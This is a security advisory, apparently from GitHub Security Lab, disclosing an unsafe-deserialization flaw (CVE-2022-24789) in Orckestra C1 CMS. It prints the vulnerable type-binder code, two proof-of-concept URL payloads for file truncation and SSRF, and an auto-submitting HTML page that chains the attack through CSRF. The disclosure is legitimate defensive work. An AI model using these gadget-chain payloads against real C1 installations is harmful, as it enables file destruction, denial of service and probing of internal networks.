Coordinated Disclosure Timeline
- 2022-01-06: Report sent to Orckestra support.
- 2022-01-06: Receipt acknowledged.
- 2022-03-28: CVE-2022-24789 was assigned.
- 2022-03-28: Advisory published.
- 2022-03-28: v6.12 was released.
Summary
Deserialization of untrusted data allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.
Product
Orckestra C1 CMS
Tested Version
Details
Issue: Deserialization of untrusted data (GHSL-2022-001)
CompositeJsonSerializer.Deserialize is reachable from multiple endpoints where the serializedEntityToken is user controlled.
The custom deserialization binder disallows creation of known remote code execution deserialization gadgets from third party libraries, but allows instantiation of any internal C1 class and classes from the standard library “mscorlib”, “System” and “System.Collections*” namespaces:
private void ValidateTypeIsSupported(string assemblyName, string typeName)
{
assemblyName = new AssemblyName(assemblyName).Name;
if (assemblyName == "Composite"
|| assemblyName.StartsWith("Composite.")
|| assemblyName.StartsWith("Orckestra."))
{
return;
}
if (assemblyName != typeof(object).Assembly.GetName().Name /* "mscorlib" */)
throw new NotSupportedException($"Not supported assembly name '{assemblyName}'");
var dotOffset = typeName.LastIndexOf(".", StringComparison.Ordinal);
if (dotOffset > 0)
{
string ns = typeName.Substring(0, dotOffset);
if (ns == nameof(System) || ns.StartsWith("System.Collections"))
{
return;
}
}
throw new NotSupportedException("Not supported object type");
}
A determined attacker is able to construct a deserialization gadget chain that allows for:
- Arbitrary file truncation to zero size. Proof of Concept (POC):
http://localhost:7913/Composite/content/views/relationshipgraph/default.aspx?EntityToken={"$type":"Composite.C1Console.Trees.TreeFunctionElementGeneratorEntityToken, Composite","parentEntityToken":{"$type":"Composite.C1Console.Elements.ElementProviderHelpers.DataGroupingProviderHelper.DataGroupingProviderHelperEntityToken, Composite","type":"a","GroupingValues":{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib","x":{"$type":"Composite.Core.Implementation.C1FileStreamImplementation, Composite","path":"c:/temp/test.txt","mode":5,"access":3,"bufferSize" :1024,"Position":0,"share":3}}},"meta:type":"Composite.C1Console.Trees.TreeFunctionElementGeneratorEntityToken"} - SSRF GET request. POC:
http://localhost:7913/Composite/content/views/relationshipgraph/default.aspx?EntityToken={"$type":"Composite.C1Console.Trees.TreeFunctionElementGeneratorEntityToken, Composite","parentEntityToken":{"$type":"Composite.C1Console.Elements.ElementProviderHelpers.DataGroupingProviderHelper.DataGroupingProviderHelperEntityToken, Composite","type":"a","GroupingValues":{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib","x":{"$type":"Composite.C1Console.Forms.SchemaBuilder%2BElementInformationExtractor, Composite","configurationFilePath":"http://localhost?get=1"}}},"meta:type":"Composite.C1Console.Trees.TreeFunctionElementGeneratorEntityToken"}
To successfully exploit the vulnerability an attacker needs to be authenticated. However the following factors allow chaining the vulnerability with a successful Cross Site Request Forgery (CSRF) attack:
1) The /Composite/content/views/relationshipgraph/ is a GET endpoint.
2) Even if it was POST, there are no anti CSRF tokens in place.
3) The default value for SameSite cookie attribute is Lax in modern browsers. It means the site cookies are automatically attached on a cross site form GET request.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:7913/Composite/content/views/relationshipgraph/default.aspx">
<input type="hidden" name="EntityToken" value="{"$type":"Composite.C1Console.Trees.TreeFunctionElementGeneratorEntityToken, Composite","parentEntityToken":{"$type":"Composite.C1Console.Elements.ElementProviderHelpers.DataGroupingProviderHelper.DataGroupingProviderHelperEntityToken, Composite","type":"a","GroupingValues":{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib","x":{"$type":"Composite.C1Console.Forms.SchemaBuilder+ElementInformationExtractor, Composite","configurationFilePath":"c:/temp/test.txt"}}},"meta:type":"Composite.C1Console.Trees.TreeFunctionElementGeneratorEntityToken"}" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
The vulnerability allows an authenticated user to:
- Exploit SSRF by making the server make arbitrary GET requests to other servers in the local network or on localhost.
- Truncate arbitrary files to zero size (effectively delete them) that may lead to denial of service (DoS) or altering application logic.
The authenticated user may perform the actions unknowingly by visiting a specially crafted site.
CVE
- CVE-2022-24789
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-001 in any communication regarding this issue.